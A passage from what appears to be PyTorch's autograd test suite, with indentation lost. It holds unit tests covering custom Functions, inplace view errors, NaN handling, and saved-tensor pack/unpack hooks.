def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_on_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b inplace for gracheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly
bw_called[0] = 0
ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_inplace_views_creation_meta(self):
# Tests creation_meta properly handled for inplace views
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.view_as(x)
@staticmethod
def backward(ctx, x):
return x
view_custom = Func.apply
def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
# This test checks the behavior of inplace-view functions when
# the views are created in grad mode or not
base = torch.rand(2, 3, requires_grad=requires_grad).clone()
# 1. Create a view with `grad_mode=grad_mode_view`
with torch.set_grad_enabled(grad_mode_view):
if fn_type == "multi_view":
inp = base.unbind()[0]
elif fn_type == "custom" :
inp = view_custom(base)
else:
inp = base.view_as(base)
# 2. Perform inplace view with `grad_mode=grad_mode_iview`
with torch.set_grad_enabled(grad_mode_iview):
if error1 is not None:
with self.assertRaisesRegex(RuntimeError, error1):
fn(inp)
return
else:
# If error is None, check that runs without error
fn(inp)
# 3. Do inplace on the (new) view
if error2 is not None:
with self.assertRaisesRegex(RuntimeError, error2):
inp.add_(1)
else:
# If error is None, check that runs without error
inp.add_(1)
no_grad_err = "A view was created in no_grad mode"
multi_view_err = "function that returns multiple views"
custom_err = "view was created inside a custom Function"
def run_tests(fn):
for fn_type in ("normal", "multi_view", "custom"):
for grad_mode_view in (True, False):
for grad_mode_iview in (True, False):
for requires_grad in (True, False):
error1 = None # expected error when we do inplace_view on original view
error2 = None # expected error when we do inplace on the resulting view
if requires_grad:
if not grad_mode_view and grad_mode_iview:
error1 = no_grad_err
if not grad_mode_view and not grad_mode_iview:
error2 = no_grad_err
if fn_type == "multi_view":
if grad_mode_view and grad_mode_iview:
error1 = multi_view_err
if grad_mode_view and not grad_mode_iview:
error2 = multi_view_err
if fn_type == "custom":
if grad_mode_view and grad_mode_iview:
error1 = custom_err
if grad_mode_view and not grad_mode_iview:
error2 = custom_err
run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
# This list was created by logging gen_inplace_or_view_type.py
# detach_ is excluded for this test because it cannot be applied to
# views and thus does not return a view
run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
run_tests(lambda v: v.transpose_(0, 0))
run_tests(lambda v: v.t_())
run_tests(lambda v: v.squeeze_(0))
run_tests(lambda v: v.unsqueeze_(0))
run_tests(lambda v: v.swapdims_(0, 0))
run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
# This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b = b.transpose(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
non_inplace_grad = a_orig.grad
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b.transpose_(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
inplace_grad = a_orig.grad
# TODO: this is a bug!
# once this is fixed, it should have the transpose removed:
# self.assertTrue(torch.allclose(non_inplace_grad, inplace_grad))
self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks that multiples views in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_python_custom_function_inplace(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks custom autograd.Function that perform inplace operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
inp = torch.randn(2, 2, 2, 2)
with torch.no_grad():
inp[inp < 0.2] = float('nan')
def test(inp, inp_dtype, out_dtype):
with torch.no_grad():
a = inp.to(inp_dtype)
a.requires_grad = True
b = torch.sum(a, dtype=out_dtype)
b.backward()
self.assertEqual(a.dtype, a.grad.dtype)
test(inp, torch.float, torch.double)
test(inp, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
class BadBw2(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
@staticmethod
def backward(ctx, foo):
return foo
@staticmethod
def vjp(ctx, foo):
return foo
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement either the backward"):
BadBw.apply(inp).sum().backward()
with self.assertRaisesRegex(RuntimeError, "Implementing both 'backward' and 'vjp'"):
BadBw2.apply(inp).sum().backward()
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
class MyFn(Function):
@staticmethod
def forward(ctx, x, metadata):
x = x.clone()
ctx.meta = metadata
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
self.assertEqual(x, 3.14)
self.assertEqual(ctx.meta["foo"], 3.14)
return gO * x, None
def get_refs(with_backward):
a = torch.tensor(3.14, requires_grad=True)
metadata = {}
out = MyFn.apply(a, metadata)
metadata["foo"] = out
if with_backward:
out.sum().backward()
self.assertEqual(a.grad, a)
return torch._C._WeakTensorRef(out)
with disable_gc():
ref = get_refs(False)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
# The backward clears the saved_variables but not the __dict__
with disable_gc():
ref = get_refs(True)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
def test_no_unnecessary_unwrapping(self):
a = torch.randn(5, requires_grad=True)
a_orig = a.detach().clone()
b = a * a
c = a * b
d = torch.exp(a)
# a is leaf
self.assertIs(b.grad_fn._saved_self, a)
self.assertIs(b.grad_fn._saved_other, a)
self.assertIs(c.grad_fn._saved_self, a)
# b is not an output
self.assertIs(c.grad_fn._saved_other, b)
# d is an output
self.assertEqual(d.grad_fn._saved_result, d)
self.assertIsNot(d.grad_fn._saved_result, d)
c.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
c.grad_fn._saved_self
# a is left untouched
self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
def test_saved_variable_packing_unpacking_saved_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
def test(get_input, is_leaf):
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x / 2)
self.assertEqual(a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(2 * a, a.grad)
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x)
self.assertEqual(2 * a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(3 * a, a.grad)
# double backward
a = get_input()
grad_fn = a.grad_fn
y = a ** 3
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
g.sum().backward()
else:
g.sum().backward()
self.assertEqual(6 * a, a.grad)
a = get_input()
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: 1)
with self.assertRaisesRegex(TypeError, "Output of saved tensor unpack_hook expected to be a Tensor"):
print(y.grad_fn._saved_self)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: x, lambda x: x)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: (x, b), lambda x: x)
def inplace_double(x):
x *= 2
return x
a = get_input()
t = a * a
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
t.grad_fn._raw_saved_self.register_hooks(inplace_double, lambda x: x / 2)
# leaf
test(lambda: torch.randn(5, requires_grad=True), True)
# not leaf, not output
test(lambda: (1 + torch.randn(5, requires_grad=True)), False)
def test_saved_variable_packing_unpacking_did_not_save_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
y.grad_fn._raw_saved_result.register_hooks(lambda x: x, lambda x: x)
self.assertEqual(y, y.grad_fn._saved_result)
self.assertIs(y.grad_fn, y.grad_fn._saved_result.grad_fn)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_saved_variable_packing_unpacking_saved_original_with_default_hooks(self):
# Tests that default hooks are properly registered, used and reset
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
# See also:
# - test_saved_variable_packing_unpacking_saved_original_with_hooks
def pack(x):
warnings.warn("pack")
return x
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
a = torch.ones(5, requires_grad=True)
warnings.simplefilter('always')
with warnings.catch_warnings(record=True) as w:
y = a * a
# should raise two warnings from a being saved twice
self.assertEqual(len(w), 2)
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x / 2):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(2 * a, y.grad_fn._saved_self)
self.assertEqual(2 * a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(4 * a, a.grad)
# Exited hooks correctly
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
def test_saved_variable_packing_unpacking_did_not_save_original_with_default_hooks(self):
# See also test_saved_variable_packing_unpacking_did_not_save_original_with_hooks
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
self.assertEqual(y, y.grad_fn._saved_result)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_setting_default_saved_variable_hooks_twice_should_fail(self):
with self.assertRaisesRegex(RuntimeError, "Setting default hooks but they have already been set. "):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
pass
def test_pack_hook_with_inplace_modification_should_fail(self):
a = torch.randn(5, requires_grad=True)
def inc(x):
x += 1
return x
with torch.autograd.graph.saved_tensors_hooks(inc, lambda x: x):
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y = torch.exp(a)
y = torch.exp(a)
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y.grad_fn._raw_saved_result.register_hooks(inc, lambda x: x)
def test_saving_variable_to_disk(self):
with tempfile.TemporaryDirectory() as tmp_dir:
def pack(x):
name = os.path.join(tmp_dir, str(uuid.uuid4()))
torch.save(x, name)
return name
def unpack(name):
return torch.load(name)
with torch.autograd.graph.saved_tensors_hooks(pack, unpack):
a = torch.ones(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
def test_default_saved_variable_hooks_double_backward(self):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
self.assertEqual(6 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 2 because only a is saved once
self.assertEqual(6 * 2 * a, a.grad)
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 4 because pow_backward is grad * (exp * self.pow(exp - 1))
# so grad is saved and self (i.e. a) is saved
self.assertEqual(6 * 4 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# combining the two above blocks: 2 * 4 = 8
# note that in that sense, a is saved twice
self.assertEqual(6 * 8 * a, a.grad)
def test_graph_save_on_cpu(self):
def test(get_input, cuda, pin_memory):
with torch.autograd.graph.save_on_cpu(pin_memory):
a = get_input()
if cuda:
a.cuda()
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
self.assertEqual(a.dtype, y.grad_fn._saved_self.dtype)
self.assertEqual(a.layout, y.grad_fn._saved_self.layout)
if y.is_sparse:
y = y.to_dense()
y.sum().backward()
self.assertEqual(2 * a, a.grad)
for cuda in [False] + ([True] if torch.cuda.is_available() else []):
for pin_memory in [True, False]:
# FloatTensor
test(lambda: torch.randn(5, requires_grad=True), cuda, pin_memory)
# DoubleTensor
test(lambda: torch.randn(5, requires_grad=True, dtype=torch.double), cuda, pin_memory)
# Sparse tensor
x = torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.]), requires_grad=True)
test(lambda: x, cuda, pin_memory)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_graph_save_on_cpu_cuda(self):
def f(x):
a = x + 1
return a * a
# with grad
a = torch.ones(1, requires_grad=True, device="cuda")
y = f(a)
memory_with_grad = torch.cuda.memory_allocated()
del a
del y
# without grad
a = torch.ones(1, requires_grad=True, device="cuda")
with torch.no_grad():
y = f(a)
memory_without_grad = torch.cuda.memory_allocated()
self.assertGreater(memory_with_grad, memory_without_grad)
del a
del y
# with hooks
with torch.autograd.graph.save_on_cpu():
a = torch.ones(1, requires_grad=True, device="cuda")
y = f(a)
memory_with_hooks = torch.cuda.memory_allocated()
self.assertEqual(memory_with_hooks, memory_without_grad)
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
def gradgradcheck_method_precision_override(test_name):
# these are just empirical observations, we should improve
gradgradcheck_precision_override = {
'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
}
non_broadcasted_test_name = test_name.split("_broadcast")[0]
override = gradgradcheck_precision_override.get(non_broadcasted_test_name)
if override:
if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
# errors accumulated across 1 dimension
override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S}
elif 'broadcast_all' in test_name:
# errors accumulated across multiple dimensions
override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S}
return override
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
input_variables, run_gradgradcheck=True, check_batched_grad=True,
check_forward_ad=False):
test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
check_batched_grad=check_batched_grad, check_forward_ad=check_forward_ad))
